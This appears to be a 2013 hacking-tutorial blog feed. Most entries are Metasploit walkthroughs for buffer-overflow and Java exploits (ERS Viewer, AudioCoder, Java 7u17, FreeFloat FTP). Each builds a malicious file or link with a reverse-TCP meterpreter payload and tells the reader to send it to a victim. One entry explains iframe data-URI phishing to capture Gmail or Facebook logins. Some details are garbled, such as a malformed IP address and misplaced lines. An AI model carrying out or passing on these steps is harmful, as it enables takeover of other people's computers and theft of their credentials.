Hacking Articles

Hacking and Securing iOS Applications

Raj Chandel — Sat, 18 May 2013 11:27:20 +0000

Download

Exploit Remote Windows PC using ERS Viewer 2011 ERS File Handling Buffer Overflow

Raj Chandel — Fri, 10 May 2013 08:21:42 +0000

This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the functionERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets

ERS Viewer 2011 (v11.04)

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/erdas_er_viewer_bof

msf exploit (erdas_er_viewer_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (erdas_er_viewer_bof)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (erdas_er_viewer_bof)>exploit

After we successfully generate the malicious ers File, it will stored on your local computer

/root/.msf4/local/msf.ers

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

exploit

Now send your msf.ers files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Windows PC using AudioCoder .M3U Buffer Overflow

Raj Chandel — Tue, 07 May 2013 12:11:47 +0000

This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets

Audio Code 0.8.18

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/audio_coder_m3u

msf exploit (audio_coder_m3u)>set payload windows/meterpreter/reverse_tcp

msf exploit (audio_coder_m3u)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (audio_coder_m3u)>exploit

After we successfully generate the malicious m3u File, it will stored on your local computer

/root/.msf4/local/msf.m3u

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

iOS Hacker’s Handbook

Raj Chandel — Fri, 03 May 2013 07:55:40 +0000

Download

CutyCapt – A Qt WebKit Web Page Rendering Capture Utility

Raj Chandel — Fri, 03 May 2013 07:33:31 +0000

CutyCapt is a small cross-platform command-line utility to capture WebKit’s rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP

First download the cutycapt from here

Open your cutycapt from command prompt and type following command

CutyCapt –url=http://www.example.com –out=anyfile.pdf (Convert in PDF Format)

CutyCapt –url=http://www.example.com –out=anyfile.jpg (Convert in Image File)

In Kali Linux

Open your kali linux terminal and type

CutyCapt –url=http://www.example.com –out=anyfile.pdf (To Convert in PDF Format)

CutyCapt –url=http://www.example.com –out=anyfile.jpg (To Convert in Image File)

Windows Forensics Analysis Toolkit

Raj Chandel — Tue, 30 Apr 2013 15:02:24 +0000

Download

Best of JAVA Hacking Exploit

Raj Chandel — Mon, 29 Apr 2013 13:34:47 +0000

Java Applet Reflection Type Confusion Remote Code Execution

Java CMM Remote Code Execution

Java Applet Method Handle Remote Code Execution

Java Applet AverageRangeStatisticImpl Remote Code Execution

Java Applet JMX Remote Code Execution

Java Applet JAX-WS Remote Code Execution

Java 7 Applet Remote Code Execution

Java Applet Field Bytecode Verifier Cache Remote Code Execution

Java Applet Rhino Script Engine Remote Code Execution

Sun Java Web Start BasicServiceImpl Code Execution

Sun Java Applet2ClassLoader Remote Code Execution

Sun Java Runtime New Plugin docbase Buffer Overflow

Java RMIConnectionImpl Deserialization Privilege Escalation

Java Statement.invoke() Trusted Method Chain Privilege Escalation

Java AtomicReferenceArray Type Violation Vulnerability

Sun Java Web Start Plugin Command Line Argument Injection

Java MixerSequencer Object GM_Song Structure Handling Vulnerability

Sun Java JRE AWT setDiffICM Buffer Overflow

Sun Java Calendar Deserialization Privilege Escalation

Java Signed Applet Social Engineering Code Execution

Sun Java Web Start Plugin Command Line Argument Injection

Hack Remote Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution

Raj Chandel — Sun, 28 Apr 2013 08:01:12 +0000

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

Java 7 Update 17

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_jre17_reflection_types

msf exploit (java_jre17_reflection_types)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (java_jre17_reflection_types)>set target 1

msf exploit (java_jre17_reflection_types)>set srvhost 192.168.0.106 (This must be an address on the local

msf exploit (java_jre17_reflection_types)>set payload windows/meterpreter/reverse_tcp

machine)

msf exploit (java_jre17_reflection_types)>exploit

Now an URL you should give to your victim http://192.168.1.0.106:8080/Mt7fUKs955I

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

Raj Chandel — Sat, 27 Apr 2013 10:52:27 +0000

Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted ‘USER’ command, a remote attacker can potentially have an unspecified impact.

Exploit Targets

FreeFloat FTP Server

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/ftp/freefloatftp_user

msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp

msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)

msf exploit (freefloatftp_user)>exploit

Hack Email or Facebook Password using Iframe URI Phishing

Raj Chandel — Fri, 26 Apr 2013 06:45:31 +0000

First of all download Super Phisher and create a Phishing page (How to Create Phishing Page)

To get the URL of the phishing page upload the page on any webhost / localhost (XAMPP in my case).

url link” height=”100%” width=”100%” border=”no” frameBorder=”0″ scrolling=”auto” >Iframe Failed

Replace the URL link in the iframe code with the URL of the uploaded phishing page

http://localhost/gmail/” height=”100%” width=”100%” border=”no” frameBorder=”0″ scrolling=”auto” >Iframe Failed

Now visit http://dopiaza.org/tools/datauri/ , select Provide Text option in URL Generator page and pasting the modified exploit code (as shown above)

Once the code has been pasted in the Text Area , click on Generate Data URL

We will get the code as shown above after generating the URL.

In the code generated replce “plain” with “html”

Convert the above URL code in short URL by using “www.tinyurl.com”

Now send the converted URL to Victim

As soon the Victim will enter his credentials you will get the same

Reference URL: http://packetstormsecurity.com/files/121389/Iframe-URI-Phishing.html